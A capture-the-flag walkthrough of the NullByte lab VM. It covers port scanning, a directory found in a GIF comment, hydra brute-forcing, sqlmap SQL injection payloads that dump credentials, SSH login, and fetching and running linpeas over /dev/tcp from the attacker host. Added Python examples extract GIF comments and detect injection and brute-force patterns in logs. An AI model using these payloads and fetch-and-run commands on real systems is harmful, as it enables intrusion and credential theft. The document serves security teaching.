Information gathering

┌──(root㉿kali)-[~]
└─# arp-scan 192.168.56.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ef:b6:d2, IPv4: 192.168.56.107
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:d8:6c:85       PCS Systemtechnik GmbH
192.168.56.113  08:00:27:b5:82:c6       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.139 seconds (119.68 hosts/sec). 3 responded
                                                                                                                                   
┌──(root㉿kali)-[~]
└─# nmap 192.168.56.113 -p- -sT -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-07 10:22 EST
Nmap scan report for 192.168.56.113
Host is up (0.017s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
45114/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:B5:82:C6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.07 seconds

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.56.113/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.113/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 318] [--> http://192.168.56.113/uploads/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.113/javascript/]
/phpmyadmin           (Status: 301) [Size: 321] [--> http://192.168.56.113/phpmyadmin/]
/server-status        (Status: 403) [Size: 302]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

Trying phpMyAdmin vulnerabilities

Reference: the CSDN blog post "phpmyadmin漏洞汇总" (phpMyAdmin vulnerability roundup).

Trying to find the phpMyAdmin version:

/readme
/readme.php
/README
/changelog
/Change
/changelog.php  
/Documetation.html 
/Documetation.txt 
/translators.html
/doc/html/index.html

None of them could be retrieved.

Tried a weak-password brute-force login: failed.

Tried known n-day exploits: none of them worked.

No access to these directories either:

/uploads
/javascript
/server-status

Gave up and looked at a writeup.

Image steganography

It turns out the intended path is image steganography, which I had not considered.

┌──(root㉿kali)-[~]
└─# wget http://192.168.56.113/main.gif
--2026-03-24 10:39:42--  http://192.168.56.113/main.gif
Connecting to 192.168.56.113:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16647 (16K) [image/gif]
Saving to: ‘main.gif’

main.gif                      100%[=================================================>]  16.26K  --.-KB/s    in 0.01s

2026-03-24 10:39:42 (1.20 MB/s) - ‘main.gif’ saved [16647/16647]


┌──(root㉿kali)-[~]
└─# exiftool main.gif
ExifTool Version Number         : 13.25
File Name                       : main.gif
Directory                       : .
File Size                       : 17 kB
File Modification Date/Time     : 2015:08:01 12:39:30-04:00
File Access Date/Time           : 2026:03:24 10:39:42-04:00
File Inode Change Date/Time     : 2026:03:24 10:39:42-04:00
File Permissions                : -rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071

This gives Comment: P-): kzMb5nVYJw
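exiftool reports that string from the GIF's Comment Extension block. To show exactly where it lives in the file, here is a small GIF89a block walker (added example, not code from the original post or from exiftool) run over a constructed minimal GIF that mimics main.gif's geometry (235x302, no colour table) and carries the same comment:

```python
import struct

# Constructed sample: minimal GIF89a, 235x302, no global colour table (like the page's
# main.gif), with one Comment Extension followed by a 1x1 image and the trailer.
SAMPLE_GIF = (
    b"GIF89a" + struct.pack("<HHBBB", 235, 302, 0x00, 0, 0)   # header + logical screen descriptor
    + b"\x21\xFE" + bytes([15]) + b"P-): kzMb5nVYJw" + b"\x00" # extension 0x21, comment label 0xFE
    + b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0x00)        # image descriptor, no local table
    + b"\x02\x02\x44\x01\x00"                                  # LZW min code size + data sub-blocks
    + b"\x3B"                                                  # trailer
)

def _sub_blocks(data, pos):
    """Read GIF data sub-blocks at pos; return (payload, position after the 0x00 terminator)."""
    out = bytearray()
    while (n := data[pos]) != 0:
        out += data[pos + 1:pos + 1 + n]
        pos += 1 + n
    return bytes(out), pos + 1

def _color_table_len(packed):
    # 3 bytes per entry, 2^(N+1) entries, present only if bit 7 of the packed field is set
    return 3 * (2 ** ((packed & 0x07) + 1)) if packed & 0x80 else 0

def gif_comments(data):
    """Walk the block structure and return every Comment Extension as a string."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF file")
    pos = 13 + _color_table_len(data[10])        # skip descriptor and global colour table
    comments = []
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                        # trailer: end of stream
            break
        if block == 0x21:                        # extension introducer
            label = data[pos]
            payload, pos = _sub_blocks(data, pos + 1)
            if label == 0xFE:                    # comment extension
                comments.append(payload.decode("latin-1"))
        elif block == 0x2C:                      # image descriptor: skip the image data
            pos += 9 + _color_table_len(data[pos + 8]) + 1
            _, pos = _sub_blocks(data, pos)
        else:
            raise ValueError(f"unexpected block 0x{block:02x} at offset {pos - 1}")
    return comments
```

Any file an upload handler accepts as an image can carry arbitrary text in these blocks, so a forensic or upload-scanning pipeline should extract them rather than trust the pixels alone.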

Tried it as the phpMyAdmin password: failed.

It turns out to be a directory.


The page gives a hint.

Password brute-forcing

Trying a password brute-force:

┌──(root㉿kali)-[~]
└─# hydra 192.168.56.113 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l admin -P /usr/share/wordlists/rockyou.txt
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-24 10:52:10
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.56.113:80/kzMb5nVYJw/index.php:key=^PASS^:invalid key
[STATUS] 4201.00 tries/min, 4201 tries in 00:01h, 14340198 to do in 56:54h, 16 active
[STATUS] 4334.67 tries/min, 13004 tries in 00:03h, 14331395 to do in 55:07h, 16 active
[80][http-post-form] host: 192.168.56.113   login: admin   password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-24 10:58:03

Got the password: elite

Tried logging in to phpMyAdmin with it: failed.

Gave up on phpMyAdmin.

SQL injection

Tried testing for SQL injection directly in the "Search for usernames" feature.


Adding a single " causes an error while two " behave normally, which indicates a SQL injection vulnerability.


This injection is fairly simple, so I just ran sqlmap on it.

┌──(root㉿kali)-[~]
└─#  sqlmap -u "http://192.168.56.113/kzMb5nVYJw/420search.php?usrtosearch=1" -batch --silent -D seth -T users --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.10.3.10#dev}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org


[*] starting @ 11:20:52 /2026-03-24/

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: usrtosearch (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: usrtosearch=1" OR NOT 7415=7415#

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: usrtosearch=1" AND EXTRACTVALUE(9161,CONCAT(0x5c,0x7171716b71,(SELECT (ELT(9161=9161,1))),0x716a626b71))-- joVK

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: usrtosearch=1" AND (SELECT 2648 FROM (SELECT(SLEEP(5)))LRcq)-- LFtL

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: usrtosearch=1" UNION ALL SELECT CONCAT(0x7171716b71,0x5a42574b6f696a70566c716c6b63676c5a76786e41576b59756a667943416f416f4378775668504d,0x716a626b71),NULL,NULL#
---
web server operating system: Linux Debian 8 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.1
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass                                        | user   | position   |
+----+---------------------------------------------+--------+------------+
| 1  | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank>    |
| 2  | --not allowed--                             | isis   | employee   |
+----+---------------------------------------------+--------+------------+


[*] ending @ 11:20:52 /2026-03-24/
┌──(root㉿kali)-[~]
└─# echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 -d
c6d6bd7ebf806f43c76acc3681703b81

After base64 decoding, the MD5 hash was cracked with an online lookup.


Got the password: omega
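Both the hydra run against /kzMb5nVYJw/index.php and the sqlmap run against 420search.php leave a clear trail in the web server's access log. As an added example (not part of the original post), the detection below parses Apache combined-format lines and flags the four sqlmap techniques listed above plus a per-minute POST burst to one path; the log lines are constructed to mirror this box, the format, the default tool User-Agents and the threshold of 30 POSTs per minute are assumptions:

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')   # Apache "combined" format

# Signatures for the four techniques sqlmap reported against the usrtosearch parameter.
SQLI_PATTERNS = {
    "error-based (EXTRACTVALUE)": re.compile(r"EXTRACTVALUE\s*\(", re.I),
    "time-based (SLEEP)": re.compile(r"SLEEP\s*\(\s*\d+", re.I),
    "UNION query": re.compile(r"UNION\s+(ALL\s+)?SELECT", re.I),
    "boolean-based (quote + OR/AND)": re.compile(r'["\']\s*(OR|AND)\s+(NOT\s+)?\d+\s*=\s*\d+', re.I),
}

# Constructed log lines: two sqlmap probes, one legitimate search, and a 40-request hydra burst.
SAMPLE_LOG = [
    '192.168.56.107 - - [24/Mar/2026:11:20:52 -0400] "GET /kzMb5nVYJw/420search.php?usrtosearch=1%22%20AND'
    '%20EXTRACTVALUE%289161%2CCONCAT%280x5c%2C1%29%29--%20joVK HTTP/1.1" 200 1540 "-" "sqlmap/1.10.3.10#dev (https://sqlmap.org)"',
    '192.168.56.107 - - [24/Mar/2026:11:20:53 -0400] "GET /kzMb5nVYJw/420search.php?usrtosearch=1%22%20UNION'
    '%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 HTTP/1.1" 200 1602 "-" "sqlmap/1.10.3.10#dev (https://sqlmap.org)"',
    '192.168.56.1 - - [24/Mar/2026:11:21:05 -0400] "GET /kzMb5nVYJw/420search.php?usrtosearch=ramses HTTP/1.1"'
    ' 200 1388 "-" "Mozilla/5.0"',
] + [
    f'192.168.56.107 - - [24/Mar/2026:10:52:{10 + i:02d} -0400] "POST /kzMb5nVYJw/index.php HTTP/1.0"'
    ' 200 512 "-" "Mozilla/4.0 (Hydra)"' for i in range(40)
]

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def sqli_hits(lines):
    """(ip, script, technique) for every request whose URL-decoded path matches a signature."""
    hits = []
    for rec in filter(None, map(parse_line, lines)):
        decoded = unquote_plus(rec["path"])      # payloads arrive percent-encoded in the log
        name = next((n for n, p in SQLI_PATTERNS.items() if p.search(decoded)), None)
        if name:
            hits.append((rec["ip"], decoded.split("?")[0], name))
    return hits

def bruteforce_sources(lines, threshold=30):
    """{(ip, path, minute): count} for POST bursts to a single path that reach the threshold."""
    counts = Counter()
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST":
            counts[(rec["ip"], rec["path"], rec["ts"][:17])] += 1   # ts[:17] is dd/Mon/yyyy:HH:MM
    return {k: v for k, v in counts.items() if v >= threshold}
```

The fix on the application side is a parameterised query for usrtosearch and a lockout or rate limit on the key form; the log rules only tell you it happened.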

SSH login

┌──(root㉿kali)-[~]
└─# ssh ramses@192.168.56.113 -p 777
The authenticity of host '[192.168.56.113]:777 ([192.168.56.113]:777)' can't be established.
ED25519 key fingerprint is SHA256:qwvVlash7TV33eAaRVfTtUXVDL3X94TXIadEOmWw6gQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.113]:777' (ED25519) to the list of known hosts.
ramses@192.168.56.113's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug  2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$

SSH login succeeded; if it had failed, a reverse shell via the SQL injection could be tried instead.

Internal information gathering

Using linpeas.sh

Found that curl is disabled on the target.

On Kali:

┌──(root㉿kali)-[~]
└─# nc -lvnp 80 < linpeas.sh
listening on [any] 80 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.113] 40414

On the target:

ramses@NullByte:~$ curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
-bash: curl: command not found
ramses@NullByte:~$ cat < /dev/tcp/192.168.56.107/80 | sh
# linpeas output omitted

This yields:

-rwsr-xr-x 1 root root 4.9K Aug  2  2015 /var/www/backup/procwatch (Unknown SUID binary!)